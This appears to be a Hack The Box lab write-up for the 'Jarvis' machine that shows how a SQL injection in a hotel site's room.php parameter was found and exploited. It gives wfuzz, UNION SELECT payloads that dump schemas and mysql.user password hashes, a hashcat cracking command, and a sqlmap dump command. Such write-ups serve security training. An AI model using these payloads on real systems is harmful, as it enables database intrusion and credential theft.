> For the complete documentation index, see [llms.txt](https://htb.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://htb.adot8.com/hack-the-box/oscp-like-boxes/linux/jarvis/eumeration/80.md).

# 80

```
```

<figure><img src="/files/QC7CPBRbFxQnsbwBIwXN" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/HuNSQgIrdTlnz38UhPSO" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/AuC50oBhcnhx2DCUpHUh" alt=""><figcaption></figcaption></figure>

Possible SQL injection

<figure><img src="/files/oE1jDqxUZ3I2NgVzS0gX" alt=""><figcaption></figcaption></figure>

```
 wfuzz -u http://supersecurehotel.htb/room.php?cod=1FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404
```

Weed out chars that change the response. Send to repeater and manually fuzz

* \+ and - could be for math&#x20;
  * 1+1
  * 1 + 1
  * "1" + "1"
  * 2 - 1
* . could mean it's an integer and not a float
* ; ending the SQL statement

```
+ . ;
```

```
GET /room.php?cod=3-1 
```

<figure><img src="/files/p0GKqcPJhchLvhQrQGNX" alt=""><figcaption></figcaption></figure>

{% hint style="success" %}
Math injection works
{% endhint %}

SQL Query most likely looks like this

```
SELECT id, image, rating, name, cost, description from rooms where cod = 1
```

<figure><img src="/files/VKDPrFqH9tSweiqcwdhU" alt=""><figcaption></figcaption></figure>

We can do any of the operations after the **where** condtion

{% hint style="info" %}
U**NION SELECT** is after the where condition but not in the table for some reason
{% endhint %}

Comes back as true

```
http://supersecurehotel.htb/room.php?cod=1%20union%20select%1,2,3,4,5,6,7
```

The statement should look like

```
SELECT id, image, rating, name, cost, description, UNKNOWN from rooms where cod = 1 union select 1,2,3,4,5,6,7
```

If the initial query is false then we can overwrite the output

```
http://supersecurehotel.htb/room.php?cod=69%20union%20select%"1","2","Adot8","4","5","6","7"
```

<figure><img src="/files/4vGYvsjTRRkbq9kuUIfF" alt=""><figcaption></figcaption></figure>

{% embed url="<https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet>" %}

```
GET /room.php?cod=69+union+select+1,2,(select+@@version),4,5,6,7 
```

<figure><img src="/files/VHm8dUI1PfDrIIdhJNnw" alt=""><figcaption></figcaption></figure>

```
union select 1,2,(select schema_name from information_schema.schemata LIMIT 1)
```

```
GET /room.php?cod=69+union+select+1,2,(select+group_concat(schema_name,":")+from+information_schema.schemata),4,5,6,7 
```

<figure><img src="/files/iUPoOhLSEvf7Sv0kK9fS" alt=""><figcaption></figcaption></figure>

```
union select 1,2,(select group_concat(TABLE_NAME,":",COLUMN_NAME,"r\n") from information_schema.COLUMNS where TABLE_SCHEMA = 'hotel'),4,5,6,7
```

```
GET /room.php?cod=69+union+select+1,2,(select+group_concat(TABLE_NAME,":",COLUMN_NAME,"r\n")+from+information_schema.COLUMNS+where+TABLE_SCHEMA+=+'hotel'),4,5,6,7 
```

<figure><img src="/files/iwTf346lRsgHEOvGXPCC" alt=""><figcaption></figcaption></figure>

```
union select 1,2,(select group_concat(host,":",user,":",password,"\r\n") from mysql.user),4,5,6,7
```

```
GET /room.php?cod=69+union+select+1,2,(select+group_concat(host,"%3a",user,":",password,"\r\n")+from+mysql.user),4,5,6,7 
```

<figure><img src="/files/UVMMIuoyi3iOP1G0tab4" alt=""><figcaption></figcaption></figure>

```
hashcat -m 300 dbadmin.hash ~/rockyou.txt -O
```

<figure><img src="/files/E8Gp9TnesBQqZtEcGi40" alt=""><figcaption></figcaption></figure>

### OR

```
adot@kali:~/oscp/htb/linux/jarvis$ sqlmap -r req -D mysql -T user --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.5#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:29:37 /2024-06-02/

[11:29:37] [INFO] parsing HTTP request from 'req'

```

<figure><img src="/files/ZBebPtkbKjT6tMS2uJ4y" alt=""><figcaption></figcaption></figure>
